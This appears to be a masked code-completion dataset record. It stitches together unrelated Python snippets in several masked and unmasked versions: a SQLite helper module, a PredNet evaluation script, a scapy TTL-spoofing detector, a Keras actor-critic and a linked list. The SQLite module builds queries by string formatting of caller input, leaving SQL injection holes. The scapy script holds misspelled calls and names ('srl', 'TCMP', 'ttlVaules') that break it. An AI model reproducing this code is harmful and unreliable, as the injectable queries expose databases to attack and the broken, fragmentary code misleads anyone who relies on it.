cursor = get_db_connection()
query = "SELECT * FROM result WHERE category = '{0}'".format(category)
for row in cursor.execute(query):
names.append(row)
except Exception:
state = State.error
print('Error with getting category file names')
finally:
close_db_connection()
return state.value, names
def get_file_names():
state = State.ok
names = list()
try:
cursor = get_db_connection()
query = 'SELECT * FROM result'
for row in cursor.execute(query):
names.append(row)
except Exception:
state = State.error
print('Error with getting category file names')
finally:
close_db_connection()
return state.value, names
| '''
Module for interaction with database
'''
import sqlite3
from enum import Enum
DB_NAME = 'categories.db'
class State(Enum):
ok = True
error = False
def get_db_connection():
try:
global connection
connection = sqlite3.connect(DB_NAME)
cursor = connection.cursor()
except Exception:
print("Error connection db {0}".format(DB_NAME))
connection.close()
return
return cursor
def close_db_connection():
try:
connection.close()
except Exception:
print("Error closing connection")
def create_new_category(category):
state = State.ok
try:
cursor = get_db_connection()
query = "CREATE TABLE {0} (word varchar(15) primary key, weight real)".format(category)
cursor.execute(query)
except Exception:
state = State.error
print("Error with creating new category")
finally:
close_db_connection()
return state
def get_category_data(category):
state = State.ok
data = list()
try:
cursor = get_db_connection()
query = "SELECT * from {0} ORDER BY weight DESC".format(category)
for row in cursor.execute(query):
data.append(row)
except Exception:
state = State.error
print("Error with getting data from {0} category".format(category))
finally:
close_db_connection()
return state.value, data
def set_category_data(category, data):
state = State.ok
try:
cursor = get_db_connection()
for key, value in data:
query = 'INSERT OR REPLACE INTO {0} (word, weight) VALUES({1},{2})'.format(category, key, value)
cursor.execute(query)
connection.commit()
except Exception:
state = State.error
print("Error with setting data to database in {0} category".format(category))
finally:
close_db_connection()
return state.value
def get_file_names_in_category(category):
state = State.ok
names = list()
try:
cursor = get_db_connection()
query = "SELECT * FROM result WHERE category = '{0}'".format(category)
for row in cursor.execute(query):
names.append(row)
except Exception:
state = State.error
print("Error with getting category file names")
finally:
close_db_connection()
return state.value, names
def get_file_names():
state = State.ok
names = list()
try:
cursor = get_db_connection()
query = "SELECT * FROM result"
for row in cursor.execute(query):
names.append(row)
except Exception:
state = State.error
print("Error with getting category file names")
finally:
close_db_connection()
return state.value, names | [
7,
8,
10,
11,
12
] |
1,615 | a3507019ca3310d7ad7eb2a0168dcdfe558643f6 | <mask token>
| <mask token>
matplotlib.use('Agg')
<mask token>
f.close()
<mask token>
train_model.load_weights(weights_file)
<mask token>
if data_format == 'channels_first':
X_test = np.transpose(X_test, (0, 1, 3, 4, 2))
X_hat = np.transpose(X_hat, (0, 1, 3, 4, 2))
print('X_hat.shape:', X_hat.shape)
print('X_test.shape:', X_test.shape)
<mask token>
if not os.path.exists(RESULTS_SAVE_DIR):
os.mkdir(RESULTS_SAVE_DIR)
<mask token>
f.write('Model MSE: %f\n' % mse_model)
f.write('Previous Frame MSE: %f' % mse_prev)
f.close()
<mask token>
plt.figure(figsize=(nt, 2 * aspect_ratio))
<mask token>
gs.update(wspace=0.0, hspace=0.0)
<mask token>
if not os.path.exists(plot_save_dir):
os.mkdir(plot_save_dir)
<mask token>
for i in plot_idx:
for t in range(nt):
plt.subplot(gs[t])
plt.imshow(X_test[i, t], interpolation='none')
plt.tick_params(axis='both', which='both', bottom='off', top='off',
left='off', right='off', labelbottom='off', labelleft='off')
if t == 0:
plt.ylabel('Actual', fontsize=10)
plt.subplot(gs[t + nt])
plt.imshow(X_hat[i, t], interpolation='none')
plt.tick_params(axis='both', which='both', bottom='off', top='off',
left='off', right='off', labelbottom='off', labelleft='off')
if t == 0:
plt.ylabel('Predicted', fontsize=10)
plt.savefig(plot_save_dir + 'plot_' + str(i) + '.png')
plt.clf()
| <mask token>
matplotlib.use('Agg')
<mask token>
n_plot = 40
batch_size = 10
nt = 5
weights_file = os.path.join(WEIGHTS_DIR,
'prednet_facebook_segmpred_weights.hdf5')
json_file = os.path.join(WEIGHTS_DIR, 'prednet_facebook_segmpred_model.json')
test_file = os.path.join(DATA_DIR, 'facebook_segmpred_X_test.hkl')
test_sources = os.path.join(DATA_DIR, 'facebook_segmpred_sources_test.hkl')
f = open(json_file, 'r')
json_string = f.read()
f.close()
train_model = model_from_json(json_string, custom_objects={'PredNet': PredNet})
train_model.load_weights(weights_file)
layer_config = train_model.layers[1].get_config()
layer_config['output_mode'] = 'prediction'
data_format = layer_config['data_format'
] if 'data_format' in layer_config else layer_config['dim_ordering']
test_prednet = PredNet(weights=train_model.layers[1].get_weights(), **
layer_config)
test_generator = SequenceGenerator(test_file, test_sources, nt,
sequence_start_mode='unique', data_format=data_format)
X_test = test_generator.create_all()
input_shape = X_test.shape[1:]
inputs = Input(shape=tuple(input_shape))
predictions = test_prednet(inputs)
test_model = Model(inputs=inputs, outputs=predictions)
X_hat = test_model.predict(X_test, batch_size)
if data_format == 'channels_first':
X_test = np.transpose(X_test, (0, 1, 3, 4, 2))
X_hat = np.transpose(X_hat, (0, 1, 3, 4, 2))
print('X_hat.shape:', X_hat.shape)
print('X_test.shape:', X_test.shape)
mse_model = np.mean((X_test[:, 1:] - X_hat[:, 1:]) ** 2)
mse_prev = np.mean((X_test[:, :-1] - X_test[:, 1:]) ** 2)
if not os.path.exists(RESULTS_SAVE_DIR):
os.mkdir(RESULTS_SAVE_DIR)
f = open(RESULTS_SAVE_DIR + 'prediction_scores.txt', 'w')
f.write('Model MSE: %f\n' % mse_model)
f.write('Previous Frame MSE: %f' % mse_prev)
f.close()
aspect_ratio = float(X_hat.shape[2]) / X_hat.shape[3]
plt.figure(figsize=(nt, 2 * aspect_ratio))
gs = gridspec.GridSpec(2, nt)
gs.update(wspace=0.0, hspace=0.0)
plot_save_dir = os.path.join(RESULTS_SAVE_DIR, 'prediction_plots/')
if not os.path.exists(plot_save_dir):
os.mkdir(plot_save_dir)
plot_idx = np.random.permutation(X_test.shape[0])[:n_plot]
for i in plot_idx:
for t in range(nt):
plt.subplot(gs[t])
plt.imshow(X_test[i, t], interpolation='none')
plt.tick_params(axis='both', which='both', bottom='off', top='off',
left='off', right='off', labelbottom='off', labelleft='off')
if t == 0:
plt.ylabel('Actual', fontsize=10)
plt.subplot(gs[t + nt])
plt.imshow(X_hat[i, t], interpolation='none')
plt.tick_params(axis='both', which='both', bottom='off', top='off',
left='off', right='off', labelbottom='off', labelleft='off')
if t == 0:
plt.ylabel('Predicted', fontsize=10)
plt.savefig(plot_save_dir + 'plot_' + str(i) + '.png')
plt.clf()
| <mask token>
import os
import numpy as np
from six.moves import cPickle
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
from keras import backend as K
from keras.models import Model, model_from_json
from keras.layers import Input, Dense, Flatten
from prednet import PredNet
from data_utils import SequenceGenerator
from kitti_settings import *
n_plot = 40
batch_size = 10
nt = 5
weights_file = os.path.join(WEIGHTS_DIR,
'prednet_facebook_segmpred_weights.hdf5')
json_file = os.path.join(WEIGHTS_DIR, 'prednet_facebook_segmpred_model.json')
test_file = os.path.join(DATA_DIR, 'facebook_segmpred_X_test.hkl')
test_sources = os.path.join(DATA_DIR, 'facebook_segmpred_sources_test.hkl')
f = open(json_file, 'r')
json_string = f.read()
f.close()
train_model = model_from_json(json_string, custom_objects={'PredNet': PredNet})
train_model.load_weights(weights_file)
layer_config = train_model.layers[1].get_config()
layer_config['output_mode'] = 'prediction'
data_format = layer_config['data_format'
] if 'data_format' in layer_config else layer_config['dim_ordering']
test_prednet = PredNet(weights=train_model.layers[1].get_weights(), **
layer_config)
test_generator = SequenceGenerator(test_file, test_sources, nt,
sequence_start_mode='unique', data_format=data_format)
X_test = test_generator.create_all()
input_shape = X_test.shape[1:]
inputs = Input(shape=tuple(input_shape))
predictions = test_prednet(inputs)
test_model = Model(inputs=inputs, outputs=predictions)
X_hat = test_model.predict(X_test, batch_size)
if data_format == 'channels_first':
X_test = np.transpose(X_test, (0, 1, 3, 4, 2))
X_hat = np.transpose(X_hat, (0, 1, 3, 4, 2))
print('X_hat.shape:', X_hat.shape)
print('X_test.shape:', X_test.shape)
mse_model = np.mean((X_test[:, 1:] - X_hat[:, 1:]) ** 2)
mse_prev = np.mean((X_test[:, :-1] - X_test[:, 1:]) ** 2)
if not os.path.exists(RESULTS_SAVE_DIR):
os.mkdir(RESULTS_SAVE_DIR)
f = open(RESULTS_SAVE_DIR + 'prediction_scores.txt', 'w')
f.write('Model MSE: %f\n' % mse_model)
f.write('Previous Frame MSE: %f' % mse_prev)
f.close()
aspect_ratio = float(X_hat.shape[2]) / X_hat.shape[3]
plt.figure(figsize=(nt, 2 * aspect_ratio))
gs = gridspec.GridSpec(2, nt)
gs.update(wspace=0.0, hspace=0.0)
plot_save_dir = os.path.join(RESULTS_SAVE_DIR, 'prediction_plots/')
if not os.path.exists(plot_save_dir):
os.mkdir(plot_save_dir)
plot_idx = np.random.permutation(X_test.shape[0])[:n_plot]
for i in plot_idx:
for t in range(nt):
plt.subplot(gs[t])
plt.imshow(X_test[i, t], interpolation='none')
plt.tick_params(axis='both', which='both', bottom='off', top='off',
left='off', right='off', labelbottom='off', labelleft='off')
if t == 0:
plt.ylabel('Actual', fontsize=10)
plt.subplot(gs[t + nt])
plt.imshow(X_hat[i, t], interpolation='none')
plt.tick_params(axis='both', which='both', bottom='off', top='off',
left='off', right='off', labelbottom='off', labelleft='off')
if t == 0:
plt.ylabel('Predicted', fontsize=10)
plt.savefig(plot_save_dir + 'plot_' + str(i) + '.png')
plt.clf()
| # -*- coding: UTF-8 -*-
'''
Evaluate trained PredNet on KITTI sequences.
Calculates mean-squared error and plots predictions.
'''
import os
import numpy as np
from six.moves import cPickle
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
from keras import backend as K
from keras.models import Model, model_from_json
from keras.layers import Input, Dense, Flatten
from prednet import PredNet
from data_utils import SequenceGenerator
from kitti_settings import *
n_plot = 40
batch_size = 10
nt = 5
# 相关的weights,json的文件
weights_file = os.path.join(WEIGHTS_DIR, 'prednet_facebook_segmpred_weights.hdf5')
json_file = os.path.join(WEIGHTS_DIR, 'prednet_facebook_segmpred_model.json')
# weights_file = os.path.join(WEIGHTS_DIR, 'prednet_kitti_weights.hdf5')
# json_file = os.path.join(WEIGHTS_DIR, 'prednet_kitti_model.json')
# weights_file = os.path.join(WEIGHTS_DIR, 'prednet_kitti_weights-extrapfinetuned.hdf5') # where weights will be saved
# json_file = os.path.join(WEIGHTS_DIR, 'prednet_kitti_model-extrapfinetuned.json')
test_file = os.path.join(DATA_DIR, 'facebook_segmpred_X_test.hkl')
test_sources = os.path.join(DATA_DIR, 'facebook_segmpred_sources_test.hkl')
# Load trained model
# 加载模型的json文件
f = open(json_file, 'r')
# 读取的json文件
json_string = f.read()
f.close()
# 从训练后存储的模型中序列化出模型,同时包含PredNet模型定制的参数,之后加载权重模型
# 存储模型将相应的json文件和weights文件存储即可,加载模型从对应的json文件和weights文件反序列化即可
train_model = model_from_json(json_string, custom_objects = {'PredNet': PredNet})
train_model.load_weights(weights_file)
# Create testing model (to output predictions)
# 创建测试模型
# 训练模型包含了InputLayer,PredNet等等,这里选取第二层即为PredNet
# print(train_model.layers)
layer_config = train_model.layers[1].get_config()
# 评估版本中将output_mode输出模型从误差error修改为predication预测
layer_config['output_mode'] = 'prediction'
data_format = layer_config['data_format'] if 'data_format' in layer_config else layer_config['dim_ordering']
# 将网络中部分修改参数加载重构为PredNet网络,keras中具有get_config和get_weights等方法
test_prednet = PredNet(weights=train_model.layers[1].get_weights(), **layer_config)
# 输入层的shape为不包括batch的batch_input_shape从第一列之后的所有
# input_shape = list(train_model.layers[0].batch_input_shape[1:])
# 输入数据为nt,总共有10帧,来预测将来的一帧
# input_shape[0] = nt
# print('input_shape:', input_shape)
test_generator = SequenceGenerator(test_file, test_sources, nt, sequence_start_mode='unique', data_format=data_format)
X_test = test_generator.create_all()
input_shape = X_test.shape[1:]
# print('input_shape:', input_shape)
# 构建输入层
inputs = Input(shape=tuple(input_shape))
# 将输入层输入到prednet网络中测试输出
predictions = test_prednet(inputs)
# 构建输入和输出模型
test_model = Model(inputs=inputs, outputs=predictions)
# 测试评估数据生成器
# test_generator = SequenceGenerator(test_file, test_sources, nt, sequence_start_mode='unique', data_format=data_format)
# X_test = test_generator.create_all()
# 预测模型时参照batch_size,一个批次的进行load然后predict
X_hat = test_model.predict(X_test, batch_size)
# 这里模型的默认通道均在最后一位
if data_format == 'channels_first':
X_test = np.transpose(X_test, (0, 1, 3, 4, 2))
X_hat = np.transpose(X_hat, (0, 1, 3, 4, 2))
print('X_hat.shape:', X_hat.shape)
print('X_test.shape:', X_test.shape)
# Compare MSE of PredNet predictions vs. using last frame. Write results to prediction_scores.txt
# 比较测试结果
mse_model = np.mean( (X_test[:, 1:] - X_hat[:, 1:])**2 ) # look at all timesteps except the first
mse_prev = np.mean( (X_test[:, :-1] - X_test[:, 1:])**2 )
if not os.path.exists(RESULTS_SAVE_DIR): os.mkdir(RESULTS_SAVE_DIR)
f = open(RESULTS_SAVE_DIR + 'prediction_scores.txt', 'w')
f.write("Model MSE: %f\n" % mse_model)
f.write("Previous Frame MSE: %f" % mse_prev)
f.close()
# Plot some predictions
aspect_ratio = float(X_hat.shape[2]) / X_hat.shape[3]
plt.figure(figsize = (nt, 2*aspect_ratio))
gs = gridspec.GridSpec(2, nt)
gs.update(wspace=0., hspace=0.)
plot_save_dir = os.path.join(RESULTS_SAVE_DIR, 'prediction_plots/')
if not os.path.exists(plot_save_dir): os.mkdir(plot_save_dir)
plot_idx = np.random.permutation(X_test.shape[0])[:n_plot]
for i in plot_idx:
for t in range(nt):
plt.subplot(gs[t])
plt.imshow(X_test[i,t], interpolation='none')
plt.tick_params(axis='both', which='both', bottom='off', top='off', left='off', right='off', labelbottom='off', labelleft='off')
if t==0: plt.ylabel('Actual', fontsize=10)
plt.subplot(gs[t + nt])
plt.imshow(X_hat[i,t], interpolation='none')
plt.tick_params(axis='both', which='both', bottom='off', top='off', left='off', right='off', labelbottom='off', labelleft='off')
if t==0: plt.ylabel('Predicted', fontsize=10)
plt.savefig(plot_save_dir + 'plot_' + str(i) + '.png')
plt.clf()
| [
0,
1,
2,
3,
4
] |
1,616 | 7081211336793bfde60b5c922f6ab9461a475949 | import time
import optparse
from IPy import IP as IPTEST
ttlValues = {}
THRESH = 5
def checkTTL(ipsrc,ttl):
if IPTEST(ipsrc).iptype() == 'PRIVATE':
return
if not ttlValues.has_key(ipsrc):
pkt = srl(IP(dst=ipsrc) / TCMP(),retry=0,timeout=0,verbose=0)
ttlValues[ipsrc] = pkt.ttl
if abs(int(ttl) - int(ttlValues[ipsrc])) > THRESH:
print '\n[!] Detected Possible Spoofed Packer From:'+ipsrc
print '[!] TTL:'+ttl+',Actual TTL:'+str(ttlVaules[ipsrc])
def testTTL(pkt):
try:
if pkt.haslayer(IP):
ipsrc = pkt.getlayer(IP).src
ttl = str(pkt.ttl)
checkTTL(ipsrc,ttl)
except:
pass
def main():
parser = optparse.OptionParser("usage%prog"+"-i<interface> -t<thresh>")
parser.add_option('-i',dest='iface',type='string',help='specify network interface')
parser.add_option('-t',dest='thresh',type='int',help='specify threshold count')
(options,args) = parser.parse_args()
if options.iface == None:
conf.iface = 'eth0'
else:
conf.iface = options.iface
if options.thresh != None:
THRESH = options.thresh
else:
THRESH = 5
sniff(prn=testTTL,store=0)
if __name__ == '__main__':
main() | null | null | null | null | [
0
] |
1,617 | 535fdee8f74b1984c5d1a5ec929310473b01239d | <mask token>
class Critic:
def __init__(self, obs_dim, action_dim, learning_rate=0.001):
self.obs_dim = obs_dim
self.action_dim = action_dim
self.model = self.make_network()
self.optimizer = keras.optimizers.Adam(learning_rate)
def make_network(self):
obs_input = keras.Input(shape=(self.obs_dim,), dtype='float32',
name='obs')
action_input = keras.Input(shape=(self.action_dim,), dtype=
'float32', name='action')
w_range = 1 / np.sqrt(self.obs_dim)
lr_0 = keras.layers.Dense(400, activation='relu', name='c_lr_0',
kernel_initializer=RandomUniform(-w_range, w_range))(obs_input)
lr_0 = keras.layers.BatchNormalization()(lr_0)
lr_1_input = keras.layers.concatenate([lr_0, action_input])
w_range = 1 / np.sqrt(400.0)
lr_1 = keras.layers.Dense(300, activation='relu', name='c_lr_1',
kernel_initializer=RandomUniform(-w_range, w_range))(lr_1_input)
w_range = 0.003
q_val = keras.layers.Dense(1, activation='linear', name='q_val',
kernel_initializer=RandomUniform(-w_range, w_range))(lr_1)
model = keras.Model(inputs=[obs_input, action_input], outputs=q_val)
return model
<mask token>
class Actor:
def __init__(self, obs_dim, action_dim, action_gain, learning_rate=0.0001):
self.obs_dim = obs_dim
self.action_dim = action_dim
self.action_gain = action_gain
self.model = self.make_network()
self.optimizer = keras.optimizers.Adam(learning_rate)
def make_network(self):
obs_input = keras.Input(shape=(self.obs_dim,), dtype='float32',
name='obs')
w_range = 1 / np.sqrt(self.obs_dim)
lr_0 = keras.layers.Dense(400, activation='relu', name='a_lr_0',
kernel_initializer=RandomUniform(-w_range, w_range))(obs_input)
lr_0 = keras.layers.BatchNormalization()(lr_0)
w_range = 1 / np.sqrt(400.0)
lr_1 = keras.layers.Dense(300, activation='relu', name='a_lr_1',
kernel_initializer=RandomUniform(-w_range, w_range))(lr_0)
lr_1 = keras.layers.BatchNormalization()(lr_1)
w_range = 0.003
action = self.action_gain * keras.layers.Dense(self.action_dim,
activation='tanh', name='action', kernel_initializer=
RandomUniform(-w_range, w_range))(lr_1)
model = keras.Model(inputs=obs_input, outputs=action)
return model
def act(self, obs):
obs = tf.reshape(obs, (-1, self.obs_dim))
return self.model(obs)
<mask token>
| <mask token>
class Critic:
def __init__(self, obs_dim, action_dim, learning_rate=0.001):
self.obs_dim = obs_dim
self.action_dim = action_dim
self.model = self.make_network()
self.optimizer = keras.optimizers.Adam(learning_rate)
def make_network(self):
obs_input = keras.Input(shape=(self.obs_dim,), dtype='float32',
name='obs')
action_input = keras.Input(shape=(self.action_dim,), dtype=
'float32', name='action')
w_range = 1 / np.sqrt(self.obs_dim)
lr_0 = keras.layers.Dense(400, activation='relu', name='c_lr_0',
kernel_initializer=RandomUniform(-w_range, w_range))(obs_input)
lr_0 = keras.layers.BatchNormalization()(lr_0)
lr_1_input = keras.layers.concatenate([lr_0, action_input])
w_range = 1 / np.sqrt(400.0)
lr_1 = keras.layers.Dense(300, activation='relu', name='c_lr_1',
kernel_initializer=RandomUniform(-w_range, w_range))(lr_1_input)
w_range = 0.003
q_val = keras.layers.Dense(1, activation='linear', name='q_val',
kernel_initializer=RandomUniform(-w_range, w_range))(lr_1)
model = keras.Model(inputs=[obs_input, action_input], outputs=q_val)
return model
def estimate_q(self, obs, action):
obs = tf.reshape(obs, (-1, self.obs_dim))
action = tf.reshape(action, (-1, self.action_dim))
return self.model([obs, action])
class Actor:
def __init__(self, obs_dim, action_dim, action_gain, learning_rate=0.0001):
self.obs_dim = obs_dim
self.action_dim = action_dim
self.action_gain = action_gain
self.model = self.make_network()
self.optimizer = keras.optimizers.Adam(learning_rate)
def make_network(self):
obs_input = keras.Input(shape=(self.obs_dim,), dtype='float32',
name='obs')
w_range = 1 / np.sqrt(self.obs_dim)
lr_0 = keras.layers.Dense(400, activation='relu', name='a_lr_0',
kernel_initializer=RandomUniform(-w_range, w_range))(obs_input)
lr_0 = keras.layers.BatchNormalization()(lr_0)
w_range = 1 / np.sqrt(400.0)
lr_1 = keras.layers.Dense(300, activation='relu', name='a_lr_1',
kernel_initializer=RandomUniform(-w_range, w_range))(lr_0)
lr_1 = keras.layers.BatchNormalization()(lr_1)
w_range = 0.003
action = self.action_gain * keras.layers.Dense(self.action_dim,
activation='tanh', name='action', kernel_initializer=
RandomUniform(-w_range, w_range))(lr_1)
model = keras.Model(inputs=obs_input, outputs=action)
return model
def act(self, obs):
obs = tf.reshape(obs, (-1, self.obs_dim))
return self.model(obs)
<mask token>
| <mask token>
class Critic:
def __init__(self, obs_dim, action_dim, learning_rate=0.001):
self.obs_dim = obs_dim
self.action_dim = action_dim
self.model = self.make_network()
self.optimizer = keras.optimizers.Adam(learning_rate)
def make_network(self):
obs_input = keras.Input(shape=(self.obs_dim,), dtype='float32',
name='obs')
action_input = keras.Input(shape=(self.action_dim,), dtype=
'float32', name='action')
w_range = 1 / np.sqrt(self.obs_dim)
lr_0 = keras.layers.Dense(400, activation='relu', name='c_lr_0',
kernel_initializer=RandomUniform(-w_range, w_range))(obs_input)
lr_0 = keras.layers.BatchNormalization()(lr_0)
lr_1_input = keras.layers.concatenate([lr_0, action_input])
w_range = 1 / np.sqrt(400.0)
lr_1 = keras.layers.Dense(300, activation='relu', name='c_lr_1',
kernel_initializer=RandomUniform(-w_range, w_range))(lr_1_input)
w_range = 0.003
q_val = keras.layers.Dense(1, activation='linear', name='q_val',
kernel_initializer=RandomUniform(-w_range, w_range))(lr_1)
model = keras.Model(inputs=[obs_input, action_input], outputs=q_val)
return model
def estimate_q(self, obs, action):
obs = tf.reshape(obs, (-1, self.obs_dim))
action = tf.reshape(action, (-1, self.action_dim))
return self.model([obs, action])
class Actor:
def __init__(self, obs_dim, action_dim, action_gain, learning_rate=0.0001):
self.obs_dim = obs_dim
self.action_dim = action_dim
self.action_gain = action_gain
self.model = self.make_network()
self.optimizer = keras.optimizers.Adam(learning_rate)
def make_network(self):
obs_input = keras.Input(shape=(self.obs_dim,), dtype='float32',
name='obs')
w_range = 1 / np.sqrt(self.obs_dim)
lr_0 = keras.layers.Dense(400, activation='relu', name='a_lr_0',
kernel_initializer=RandomUniform(-w_range, w_range))(obs_input)
lr_0 = keras.layers.BatchNormalization()(lr_0)
w_range = 1 / np.sqrt(400.0)
lr_1 = keras.layers.Dense(300, activation='relu', name='a_lr_1',
kernel_initializer=RandomUniform(-w_range, w_range))(lr_0)
lr_1 = keras.layers.BatchNormalization()(lr_1)
w_range = 0.003
action = self.action_gain * keras.layers.Dense(self.action_dim,
activation='tanh', name='action', kernel_initializer=
RandomUniform(-w_range, w_range))(lr_1)
model = keras.Model(inputs=obs_input, outputs=action)
return model
def act(self, obs):
obs = tf.reshape(obs, (-1, self.obs_dim))
return self.model(obs)
if __name__ == '__main__':
actor = Actor(4, 1, 2)
critic = Critic(4, 1)
obs = np.random.rand(4)
action = actor.act(obs)[0]
q_val = critic.estimate_q(obs, action)[0]
print('\nRandom actor-critic output for obs={}:'.format(obs))
print('Action: {}, Qval: {}'.format(action, q_val))
| import numpy as np
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras.initializers import RandomUniform
class Critic:
def __init__(self, obs_dim, action_dim, learning_rate=0.001):
self.obs_dim = obs_dim
self.action_dim = action_dim
self.model = self.make_network()
self.optimizer = keras.optimizers.Adam(learning_rate)
def make_network(self):
obs_input = keras.Input(shape=(self.obs_dim,), dtype='float32',
name='obs')
action_input = keras.Input(shape=(self.action_dim,), dtype=
'float32', name='action')
w_range = 1 / np.sqrt(self.obs_dim)
lr_0 = keras.layers.Dense(400, activation='relu', name='c_lr_0',
kernel_initializer=RandomUniform(-w_range, w_range))(obs_input)
lr_0 = keras.layers.BatchNormalization()(lr_0)
lr_1_input = keras.layers.concatenate([lr_0, action_input])
w_range = 1 / np.sqrt(400.0)
lr_1 = keras.layers.Dense(300, activation='relu', name='c_lr_1',
kernel_initializer=RandomUniform(-w_range, w_range))(lr_1_input)
w_range = 0.003
q_val = keras.layers.Dense(1, activation='linear', name='q_val',
kernel_initializer=RandomUniform(-w_range, w_range))(lr_1)
model = keras.Model(inputs=[obs_input, action_input], outputs=q_val)
return model
def estimate_q(self, obs, action):
obs = tf.reshape(obs, (-1, self.obs_dim))
action = tf.reshape(action, (-1, self.action_dim))
return self.model([obs, action])
class Actor:
def __init__(self, obs_dim, action_dim, action_gain, learning_rate=0.0001):
self.obs_dim = obs_dim
self.action_dim = action_dim
self.action_gain = action_gain
self.model = self.make_network()
self.optimizer = keras.optimizers.Adam(learning_rate)
def make_network(self):
obs_input = keras.Input(shape=(self.obs_dim,), dtype='float32',
name='obs')
w_range = 1 / np.sqrt(self.obs_dim)
lr_0 = keras.layers.Dense(400, activation='relu', name='a_lr_0',
kernel_initializer=RandomUniform(-w_range, w_range))(obs_input)
lr_0 = keras.layers.BatchNormalization()(lr_0)
w_range = 1 / np.sqrt(400.0)
lr_1 = keras.layers.Dense(300, activation='relu', name='a_lr_1',
kernel_initializer=RandomUniform(-w_range, w_range))(lr_0)
lr_1 = keras.layers.BatchNormalization()(lr_1)
w_range = 0.003
action = self.action_gain * keras.layers.Dense(self.action_dim,
activation='tanh', name='action', kernel_initializer=
RandomUniform(-w_range, w_range))(lr_1)
model = keras.Model(inputs=obs_input, outputs=action)
return model
def act(self, obs):
obs = tf.reshape(obs, (-1, self.obs_dim))
return self.model(obs)
if __name__ == '__main__':
actor = Actor(4, 1, 2)
critic = Critic(4, 1)
obs = np.random.rand(4)
action = actor.act(obs)[0]
q_val = critic.estimate_q(obs, action)[0]
print('\nRandom actor-critic output for obs={}:'.format(obs))
print('Action: {}, Qval: {}'.format(action, q_val))
| import numpy as np
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras.initializers import RandomUniform
class Critic:
def __init__(self, obs_dim, action_dim, learning_rate=0.001):
self.obs_dim = obs_dim
self.action_dim = action_dim
self.model = self.make_network()
self.optimizer = keras.optimizers.Adam(learning_rate)
# self.model.compile(loss="mse", optimizer=self.optimizer)
def make_network(self):
obs_input = keras.Input(shape=(self.obs_dim,), dtype="float32", name="obs")
action_input = keras.Input(shape=(self.action_dim,), dtype="float32", name="action")
# layer 0 - with obs input
w_range = 1 / np.sqrt(self.obs_dim)
lr_0 = keras.layers.Dense(400, activation="relu", name="c_lr_0", kernel_initializer=RandomUniform(-w_range, w_range))(obs_input)
# add
lr_0 = keras.layers.BatchNormalization()(lr_0)
# layer 1 with concatenated input of [lr_0, action]
lr_1_input = keras.layers.concatenate([lr_0, action_input])
w_range = 1 / np.sqrt(400.0)
lr_1 = keras.layers.Dense(300, activation="relu", name="c_lr_1", kernel_initializer=RandomUniform(-w_range, w_range))(lr_1_input)
# final layers with linear activation
w_range = 0.003
q_val = keras.layers.Dense(1, activation="linear", name="q_val", kernel_initializer=RandomUniform(-w_range, w_range))(lr_1)
model = keras.Model(inputs=[obs_input, action_input], outputs=q_val)
return model
def estimate_q(self, obs, action):
obs = tf.reshape(obs, (-1, self.obs_dim))
action = tf.reshape(action, (-1, self.action_dim))
return self.model([obs, action])
class Actor:
# 输入特征数,动作特征数,奖励
def __init__(self, obs_dim, action_dim, action_gain, learning_rate=0.0001):
self.obs_dim = obs_dim
self.action_dim = action_dim
self.action_gain = action_gain
self.model = self.make_network()
self.optimizer = keras.optimizers.Adam(learning_rate)
def make_network(self):
obs_input = keras.Input(shape=(self.obs_dim,), dtype="float32", name="obs")
# layer 0 - with obs input
w_range = 1 / np.sqrt(self.obs_dim)
lr_0 = keras.layers.Dense(400, activation="relu", name="a_lr_0", kernel_initializer=RandomUniform(-w_range, w_range))(obs_input)
# add
lr_0 = keras.layers.BatchNormalization()(lr_0)
# layer 1
w_range = 1 / np.sqrt(400.0)
lr_1 = keras.layers.Dense(300, activation="relu", name="a_lr_1", kernel_initializer=RandomUniform(-w_range, w_range))(lr_0)
# add
lr_1 = keras.layers.BatchNormalization()(lr_1)
# action layer
# tanh 函数输出在(-1, 1)之间,用action_gain缩放
w_range = 0.003
action = self.action_gain * keras.layers.Dense(self.action_dim, activation="tanh", name="action", kernel_initializer=RandomUniform(-w_range, w_range))(lr_1)
model = keras.Model(inputs=obs_input, outputs=action)
return model
def act(self, obs):
# 将状态转换为批量的形式
obs = tf.reshape(obs, (-1, self.obs_dim))
return self.model(obs)
if __name__ == "__main__":
actor = Actor(4, 1, 2)
critic = Critic(4, 1)
obs = np.random.rand(4)
action = actor.act(obs)[0]
q_val = critic.estimate_q(obs, action)[0]
# keras.utils.plot_model(actor, 'actor.png', show_shapes=True)
# keras.utils.plot_model(critic, 'critic.png', show_shapes=True)
print("\nRandom actor-critic output for obs={}:".format(obs))
print("Action: {}, Qval: {}".format(action, q_val))
| [
7,
8,
9,
10,
11
] |
1,618 | 192bd3c783f6f822f8e732ddf47d7fc3b22c032b | <mask token>
class LinkedList(object):
<mask token>
def __init__(self, iterable=()):
"""Constructor for the Linked List object."""
self.head = None
self._counter = 0
if isinstance(iterable, (str, tuple, list)):
for item in iterable:
self.push(item)
def push(self, val):
"""Add a new value to the head of the Linked List."""
new_head = Node(val, self.head)
self.head = new_head
self._counter += 1
<mask token>
<mask token>
def search(self, val):
"""Search linked list for requested node."""
search_through = self.head
while search_through:
if val == search_through.data:
return search_through
else:
search_through = search_through.next
return search_through
def remove(self, node):
"""Remove selected node."""
current_node = self.head
previous_node = None
found = False
if current_node is None:
raise IndexError('Nothing in the list.')
try:
while current_node and found is False:
if node == current_node.data:
found = True
else:
previous_node = current_node
current_node = current_node.next
if previous_node is None:
self.pop()
elif current_node.next is None:
previous_node.next = None
else:
previous_node.next = current_node.next
except AttributeError:
raise ValueError('No such node.')
self._counter -= 1
<mask token>
def __len__(self):
"""Return length of linked list."""
return self.size()
<mask token>
| <mask token>
class LinkedList(object):
<mask token>
def __init__(self, iterable=()):
"""Constructor for the Linked List object."""
self.head = None
self._counter = 0
if isinstance(iterable, (str, tuple, list)):
for item in iterable:
self.push(item)
def push(self, val):
"""Add a new value to the head of the Linked List."""
new_head = Node(val, self.head)
self.head = new_head
self._counter += 1
def pop(self):
"""Remove and return the value if the head of the Linked List."""
if not self.head:
raise IndexError('Empty list, unable to pop')
output = self.head.data
self.head = self.head.next
self._counter -= 1
return output
def size(self):
"""Return size of our list."""
return self._counter
def search(self, val):
"""Search linked list for requested node."""
search_through = self.head
while search_through:
if val == search_through.data:
return search_through
else:
search_through = search_through.next
return search_through
def remove(self, node):
"""Remove selected node."""
